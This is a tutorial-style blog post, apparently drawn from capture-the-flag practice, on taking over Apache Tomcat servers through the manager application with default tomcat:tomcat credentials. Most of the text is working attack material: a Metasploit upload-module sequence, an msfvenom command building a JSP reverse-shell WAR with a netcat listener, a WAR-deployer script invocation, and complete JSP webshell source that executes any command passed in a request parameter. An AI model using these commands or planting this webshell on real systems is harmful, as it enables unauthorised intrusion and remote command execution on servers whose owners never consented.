Hello Friends, today through this article I would like to
share my experience “how to exploit Tomcat Manger Application” if you have
default login credential (tomcat: tomcat).
While playing CTF, many times I found Apache Tomcat is running in target
machine that have configured with default login and this can help us to get
remote machine shell. Therefore I feel, I should write all possible ways to
exploit tomcat manger application to gaining webshell of remote machine.
Table of Content
§ Tomcat Manager Authenticated Upload Code Execution
§ Generate .war Format Backdoor
§ Tomcat War Deployer Script
§ Generate a JSP Webshell
Let’s start with nmap scan
and to tomcat service check port 8080 as tomcat.
nmap -sV -p8080 192.168.1.101
From nmap output result, we found port 8080 is open for
Apache Tomcat. So we navigate to web browser and on exploring Target IP: port
we saw HTTP authentication page to login in tomcat manger application.
Tomcat Manager Authenticated Upload Code
Execution
This module can be used to execute a payload on Apache
Tomcat servers that have an exposed "manager" application. The
payload is uploaded as a WAR archive containing a jsp application using a POST
request against the /manager/html/upload component. NOTE: The compatible
payload sets vary based on the selected target. For example, you must select
the Windows target to use native Windows payloads.
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost
192.168.1.101
msf exploit(multi/http/tomcat_mgr_upload) > set rport
8080
msf exploit(multi/http/tomcat_mgr_upload) > set
httpusername tomcat
msf exploit(multi/http/tomcat_mgr_upload) > set
httppassword tomcat
msf exploit(multi/http/tomcat_mgr_upload) > exploit
As result you can observe that, we have meterpreter
session of the target machine.
Generate .war Format Backdoor
We can use msfvenom for generating a .war format backdoor
for java/jsp payload, all you need to do is just follow the given below syntax
to create .war format file and then run netcat listener.
Syntax: msfvenom
-p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file
name]
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.101
LPORT=1234 -f war > shell.war
nc -lvp 1234
Now login to tomcat manager application using tomcat: tomcat as username: password.
You will be welcomed by admin dashboard where you can upload a .war file.
As you can observe I had browser the malicious shell.war
file to be deploy as highlighted in the image. As soon as you will upload your
file, you will saw the /path entry for your file in the table of Applications.
To execute your .war file, you have to click on the /.war
file path mention in the Application table. Or you can directly explore http://target_IP:port/file_name.
As soon as you will execute your file you will get reverse
connection through netcat.
Booom!!! One more time we have access remote webshell.
Tomcat War Deployer Script
This is a penetration testing tool intended to leverage
Apache Tomcat credentials in order to automatically generate and deploy JSP
Backdoor, as well as invoke it afterwards and provide nice shell (either via
web gui, listening port binded on remote machine or as a reverse tcp payload
connecting back to the adversary).
In practice, it generates JSP backdoor WAR package
on-the-fly and deploys it at the Apache Tomcat Manager Application, using valid
HTTP Authentication credentials that pentester provided (or custom ones, in the
end, we all love tomcat:tomcat ).
You can download it
from here: https://github.com/mgeeky/tomcatWarDeployer
cd tomcatWarDeployer
ls
Now follow the syntax to exploit the target machine without
uploading .war file manually.
Syntax : ./tomcatWarDeployer.py
-U [usrename] -p [password]-H [Kali Linux IP]-p [Listening port]
[target_IP]:[tomcat_port]
./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108
-p 4567 192.168.1.101:8080
On executing above command, I got webshell directly as you
can observe it in the given below image.
Generate a JSP Webshell
In this part, we are going to see how we can generate and
deploy a Webshell to gain command execution on the Tomcat manger application.
First, we will need to write the Webshell and package it as
a .war file format. To write the jsp Webshell, we are using the following code
which I found from from this Link: https://pentesterlab.com/exercises/cve-2007-1860/course
<%@ page import="java.io.*" %>
<%
String cmd =
request.getParameter("cmd");
String output =
"";
if(cmd != null)
{
String s =
null;
try {
Process p
= Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s =
sI.readLine()) != null) { output += s+""; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<%=output %>
Save the code as index.jsp and then execute following
command to package it as .war file.
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *
With the help of above command you will get a war file,
which you can deploy in tomcat manger application.
As you can observe from the given below image, I had
deployed my webshell.war file which successfully uploaded, now let’s click on
this file for its execution.
On executing /webshell you will get a HTTP 404 error, now
execute index.jsp file in the as given below:
On executing above URL you will get command execution form, now
use it wisely to cmd commands.
Hopefully! You have enjoyed this article how to get access
to the Tomcat manager using CVE-2007-1860
0 comments:
Post a Comment